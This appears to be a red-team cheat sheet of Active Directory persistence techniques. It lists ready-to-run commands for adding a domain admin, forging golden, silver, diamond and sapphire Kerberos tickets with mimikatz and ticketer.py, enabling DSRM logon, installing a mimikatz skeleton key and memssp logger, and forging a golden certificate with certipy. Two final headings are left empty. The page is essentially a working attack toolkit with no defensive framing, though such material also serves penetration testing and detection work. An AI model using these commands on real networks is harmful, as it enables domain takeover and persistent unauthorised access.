Persistence

ADD DA

  • net group "domain admins" myuser /add /domain

Golden ticket

  • ticketer.py -aesKey <aeskey> -domain-sid <domain_sid> -domain <domain> <anyuser>
  • mimikatz "kerberos::golden /user:<admin_user> /domain:<domain> /sid:<domain-sid>/aes256:<krbtgt_aes256> /ptt"

Silver Ticket

  • mimikatz "kerberos::golden /sid:<current_user_sid> /domain:<domain-sid> /target:<target_server> /service:<target_service> /aes256:<computer_aes256_key> /user:<any_user> /ptt"
  • ticketer.py -nthash <machine_nt_hash> -domain-sid <domain_sid> -domain <domain> <anyuser>

Directory Service Restore Mode (DSRM)

  • PowerShell New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Skeleton Key

  • mimikatz "privilege::debug" "misc::skeleton" "exit" #password is mimikatz

Custom SSP

  • mimikatz "privilege::debug" "misc::memssp" "exit"
    • C:\Windows\System32\kiwissp.log

Golden certificate

  • certipy ca -backup -ca '<ca_name>' -username <user>@<domain> -hashes <hash>
    • certipy forge -ca-pfx <ca_private_key> -upn <user>@<domain> -subject 'CN=<user>,CN=Users,DC=<CORP>,DC=<LOCAL>

Diamond ticket

  • ticketer.py -request -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> -user-id <user_id> -groups '512,513,518,519,520' <anyuser>

Saphire Ticket

  • ticketer.py -request -impersonate <anyuser> -domain <domain> -user <user> -password <password> -nthash <hash> -aesKey <aeskey> -domain-sid <domain_sid> 'ignored'

DC shadow

ACL manipulation